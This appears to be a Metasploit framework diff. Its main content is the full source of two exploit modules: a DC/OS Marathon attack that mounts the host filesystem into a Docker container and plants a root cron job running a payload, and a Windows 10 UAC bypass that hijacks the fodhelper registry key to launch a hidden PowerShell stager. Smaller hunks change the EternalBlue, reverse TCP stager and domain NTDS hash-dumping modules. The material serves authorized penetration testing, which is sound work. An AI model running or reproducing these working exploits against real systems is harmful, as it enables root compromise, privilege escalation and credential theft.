def initialize(info = {})
super(update_info(info,
'Name' => 'DC/OS Marathon UI Docker Exploit',
'Description' => %q{
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS cluster.
},
'Author' => 'Erik Daguerre',
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
],
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}
]
],
'DefaultOptions' => { 'WfsDelay' => 75 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 03, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
])
end
def get_apps
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
return unless res and res.code == 200
# verify it is marathon ui, and is returning content-type json
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
apps = JSON.parse(res.body)
apps
end
def del_container(container_id)
res = send_request_raw({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, container_id)
})
return unless res and res.code == 200
res.code
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
payload_data = nil
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
command << "echo \"\" >> #{echo_cron_path}\n"
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
command << "sleep 120"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
container_data = {
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
'cpus' => 1,
'mem' => 128,
'disk' => 0,
'instances' => 1,
'id' => container_id,
'container' => {
'docker' => {
'image' => datastore['DOCKERIMAGE'],
'network' => 'HOST',
},
'type' => 'DOCKER',
'volumes' => [
{
'hostPath' => '/',
'containerPath' => mnt_path,
'mode' => 'RW'
}
],
},
'env' => {},
'labels' => {}
}
container_data
end
def check
return Exploit::CheckCode::Safe if get_apps.nil?
Exploit::CheckCode::Appears
end
def exploit
if get_apps.nil?
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id()
res = send_request_raw({
'method' => 'POST',
'uri' => target_uri.path,
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
})
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
print_status('The docker container is created, waiting for it to deploy')
register_files_for_cleanup(cron_path, payload_path)
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
deleted_container = false
print_status("Waiting up to #{wait_time} seconds for docker container to start")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
apps_status = get_apps
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
apps_status['apps'].each do |app|
next if app['id'] != "/#{container_id}"
if app['tasksRunning'] == 1
print_status('The docker container is running, removing it')
del_container(container_id)
deleted_container = true
wait_time = 0
else
vprint_status('The docker container is not yet running')
end
break
end
end
# If the docker container does not deploy remove it and fail out.
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end

1
modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
View File

@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2014-5470'],
['EDB', '34450'],
['OSVDB', '110601']
],

209
modules/exploits/windows/local/bypassuac_fodhelper.rb Normal file
View File

@ -0,0 +1,209 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
CMD_MAX_LEN = 16383
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
'Description' => %q{
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
},
'License' => MSF_LICENSE,
'Author' => [
'winscriptingblog', # UAC bypass discovery and research
'amaloteaux', # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
]
],
'DisclosureDate' => 'May 12 2017'
)
)
end
def check
if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
commspec = '%COMSPEC%'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] == ARCH_X64
if session.arch == ARCH_X86
# fodhelper.exe is x64 only exe
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
if target_arch.first == ARCH_X64
# We can't use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = "powershell.exe"
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
end
psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
if existing.empty?
registry_createkey(FODHELPER_WRITE_KEY, registry_view)
end
print_status("Configuring payload and stager registry keys ...")
unless exist_delegate
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
end
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path("/c #{FODHELPER_PATH}")
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(5)
handler(client)
print_status("Cleaining up registry keys ...")
unless exist_delegate
registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(FODHELPER_DEL_KEY, registry_view)
else
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end

5
modules/exploits/windows/smb/ms17_010_eternalblue.rb
View File

@ -8,7 +8,7 @@ require 'ruby_smb/smb1/packet'
require 'windows_error'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
@ -32,6 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
The module will attempt to use Anonymous login, by default, to authenticate to perform the
exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use
those instead.
On some systems, this module may cause system instability and crashes, such as a BSOD or
a reboot. This may be more likely with some payloads.
},
'Author' => [

4
modules/payloads/stagers/linux/x86/reverse_tcp.rb
View File

@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
module MetasploitModule
CachedSize = 71
CachedSize = 99
include Msf::Payload::Stager
include Msf::Payload::Linux::ReverseTcp
@ -18,7 +18,7 @@ module MetasploitModule
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [ 'skape', 'egypt' ],
'Author' => [ 'skape', 'egypt', 'tkmru' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,

2
modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
View File

@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
module MetasploitModule
CachedSize = 114
CachedSize = 142
include Msf::Payload::Stager
include Msf::Payload::Linux::ReverseTcp

2
modules/payloads/stagers/python/reverse_tcp_ssl.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl'
module MetasploitModule
CachedSize = 378
CachedSize = 470
include Msf::Payload::Stager
include Msf::Payload::Python::ReverseTcpSsl

4
modules/post/windows/gather/credentials/domain_hashdump.rb
View File

@ -33,10 +33,13 @@ class MetasploitModule < Msf::Post
if preconditions_met?
ntds_file = copy_database_file
unless ntds_file.nil?
file_stat = client.fs.file.stat(ntds_file)
print_status "NTDS File Size: #{file_stat.size.to_s} bytes"
print_status "Repairing NTDS database after copy..."
print_status repair_ntds(ntds_file)
realm = sysinfo["Domain"]
ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
print_status "Started up NTDS channel. Preparing to stream results..."
ntds_parser.each_account do |ad_account|
print_good ad_account.to_s
report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
@ -46,6 +49,7 @@ class MetasploitModule < Msf::Post
report_hash(hash_string.downcase,ad_account.name, realm)
end
end
print_status "Deleting backup of NTDS.dit at #{ntds_file}"
rm_f(ntds_file)
end
end